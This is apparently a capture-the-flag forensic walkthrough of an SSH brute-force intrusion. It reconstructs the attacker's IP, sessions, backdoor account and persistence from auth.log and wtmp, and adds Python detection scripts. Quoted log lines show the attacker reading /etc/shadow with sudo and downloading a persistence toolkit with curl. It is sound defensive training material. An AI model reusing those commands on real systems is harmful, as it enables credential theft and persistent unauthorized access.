brutus

Released: 2024-04-04
Retired: 2024-04-04
Author: CyberJunkie

Scenario

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.


Task 01

Question: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

The available auth.log shows a brute force attack targeting various SSH users. Within the logged period (from 06:18:01 to 06:41:01), there are 48 failed login attempts from the same IP address on the users admin, backup, server_adm, svc_account, and root.

Answer: 65.2.161.68
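The pattern used in Tasks 01 and 02 (many failed SSH password attempts from one source, followed by an accepted login from that same source) can be pulled out of auth.log programmatically. The following is an added example, not part of the original write-up; the sample log lines are constructed and the failure threshold is an assumed tuning value.

```python
import re
from collections import Counter, defaultdict

# Syslog-style auth.log prefix as shown in this write-up:
# "Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: message"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (?P<prog>[\w-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted password for (?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def analyze_auth_log(lines, threshold=10):
    """Count failed SSH password attempts per source IP, record which usernames
    were tried, and report every accepted password login from an IP that had
    already reached `threshold` failures (brute force followed by success)."""
    failures = Counter()            # ip -> number of failed attempts
    users = defaultdict(set)        # ip -> usernames tried
    suspicious_logins = []          # (timestamp, user, ip) after threshold
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["prog"] != "sshd":
            continue
        m = FAILED_RE.search(rec["msg"])
        if m:
            failures[m["ip"]] += 1
            users[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED_RE.search(rec["msg"])
        if m and failures[m["ip"]] >= threshold:
            suspicious_logins.append((rec["ts"], m["user"], m["ip"]))
    return failures, users, suspicious_logins

# Constructed sample lines (not the Sherlock's actual auth.log); 203.0.113.7 is a documentation address
SAMPLE = [
    "Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2",
    "Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: Failed password for root from 65.2.161.68 port 46392 ssh2",
    "Mar  6 06:31:32 ip-172-31-35-28 sshd[2329]: Failed password for invalid user backup from 65.2.161.68 port 46400 ssh2",
    "Mar  6 06:31:33 ip-172-31-35-28 sshd[2331]: Failed password for root from 203.0.113.7 port 50000 ssh2",
    "Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2",
]

if __name__ == "__main__":
    failed, tried, hits = analyze_auth_log(SAMPLE, threshold=3)
    print(failed.most_common(1), dict(tried), hits)
```

With the real auth.log, run the same function over `open("auth.log")` and raise the threshold to something appropriate for the environment.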


Task 02

Question: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

After 3 failed attempts against the root account, an automated login as root succeeded at 06:31:40 from the IP address identified in Task 01. Because this was only the brute-force tool verifying the credential, the session was closed again immediately; the tool had simply reported the working username and password combination back to the attacker.

Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.

[...]

Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Received disconnect from 65.2.161.68 port 34782:11: Bye Bye
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Disconnected from user root 65.2.161.68 port 34782
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session closed for user root
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Session 34 logged out. Waiting for processes to exit.

Answer: root


Task 03

Question: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

The wtmp file records all login and logout activities. Using the last command, the provided artifact can be read to determine the sought-after timestamp. Note that last prints times in the analyst's local time zone (+01:00 in the output below), so the root login shown as 07:32:45+01:00 is 06:32:45 UTC, which lines up with the auth.log timestamps.

$ last -f wtmp --time-format iso
cyberjun pts/1        65.2.161.68      2024-03-06T07:37:35+01:00   gone - no logout
root     pts/1        65.2.161.68      2024-03-06T07:32:45+01:00 - 2024-03-06T07:37:24+01:00  (00:04)
root     pts/0        203.101.190.9    2024-03-06T07:19:55+01:00   gone - no logout
reboot   system boot  6.2.0-1018-aws   2024-03-06T07:17:15+01:00   still running
root     pts/1        203.101.190.9    2024-02-11T11:54:27+01:00 - 2024-02-11T12:08:04+01:00  (00:13)
root     pts/1        203.101.190.9    2024-02-11T11:41:11+01:00 - 2024-02-11T11:41:46+01:00  (00:00)
root     pts/0        203.101.190.9    2024-02-11T11:33:49+01:00 - 2024-02-11T12:08:04+01:00  (00:34)
root     pts/0        203.101.190.9    2024-01-25T12:15:40+01:00 - 2024-01-25T13:34:34+01:00  (01:18)
ubuntu   pts/0        203.101.190.9    2024-01-25T12:13:58+01:00 - 2024-01-25T12:15:12+01:00  (00:01)
reboot   system boot  6.2.0-1017-aws   2024-01-25T12:12:17+01:00 - 2024-02-11T12:09:18+01:00 (16+23:57)

wtmp begins 2024-01-25T12:12:17+01:00

Answer: 2024-03-06 06:32:45


Task 04

Question: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

After the attacker’s automated login at 06:31:40 from Task 02, the attacker returns and uses the discovered login credentials for another access from the known IP. This SSH session is assigned the session number 37.

Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

Answer: 37


Task 05

Question: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

Shortly after the attacker’s successful login, auth.log shows the creation of a new user at 06:34:18 with UID=1002, GID=1002. This user is subsequently added to the sudo group.

Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1

[...]

Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'

Answer: cyberjunkie


Task 06

Question: What is the MITRE ATT&CK sub-technique ID used for persistence?

The attacker created a local account (cyberjunkie) using the useradd command to maintain persistent access to the system. This persistence technique corresponds to MITRE ATT&CK® sub-technique T1136.001 (Create Account: Local Account).

Answer: T1136.001


Task 07

Question: How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)

According to Task 03, the attacker logged in at 06:32:45, and the end of that session at 06:37:24 is recorded in auth.log as well (it also matches the wtmp entry). The session duration is the difference between the two timestamps.

$ printf "%s\n" $(( $(date -d "06:37:24" "+%s") - $(date -d "06:32:45" "+%s") ))
279

Answer: 279
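Rather than subtracting two timestamps by hand, the sshd session open and close events in auth.log can be paired by the sshd process ID (the "Accepted" line and the matching pam_unix "session closed" line share the same sshd[PID], as in Task 02). This is an added example, not part of the original write-up; the sample lines are constructed and the year is supplied by the analyst because auth.log omits it.

```python
import re
from datetime import datetime

# Syslog-style auth.log prefix restricted to sshd lines:
# "Mar  6 06:32:45 ip-172-31-35-28 sshd[2491]: message"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
OPEN_RE = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")
CLOSE_RE = re.compile(r"pam_unix\(sshd:session\): session closed for user (?P<user>\S+)")

def parse_ts(ts, year):
    # auth.log carries no year; the analyst supplies it (2024 for this case)
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def ssh_session_durations(lines, year=2024):
    """Pair each sshd 'Accepted' line with the 'session closed' line logged by
    the same sshd PID and return (user, ip, start, seconds) tuples. Sessions
    that never close within the log are returned with seconds=None."""
    open_sessions = {}   # pid -> (user, ip, start datetime)
    results = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        pid, msg = m["pid"], m["msg"]
        o = OPEN_RE.search(msg)
        if o:
            open_sessions[pid] = (o["user"], o["ip"], parse_ts(m["ts"], year))
            continue
        if CLOSE_RE.search(msg) and pid in open_sessions:
            user, ip, start = open_sessions.pop(pid)
            end = parse_ts(m["ts"], year)
            results.append((user, ip, start, int((end - start).total_seconds())))
    for user, ip, start in open_sessions.values():
        results.append((user, ip, start, None))
    return results

# Constructed sample lines (not the Sherlock's actual auth.log)
SAMPLE = [
    "Mar  6 06:32:45 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2",
    "Mar  6 06:32:45 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)",
    "Mar  6 06:37:24 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session closed for user root",
    "Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2",
]

if __name__ == "__main__":
    for user, ip, start, seconds in ssh_session_durations(SAMPLE):
        print(f"{user}@{ip} started {start:%Y-%m-%d %H:%M:%S} lasted {seconds} s")
```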


Task 08

Question: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

The newly created user logged in at 06:37:34 and shortly after, at 06:39:38, used the newly assigned sudo privileges to download a Linux persistence toolkit (linper) using curl.

Mar  6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.
Mar  6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session closed for user root

[...]

Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Mar  6 06:39:38 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)

Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh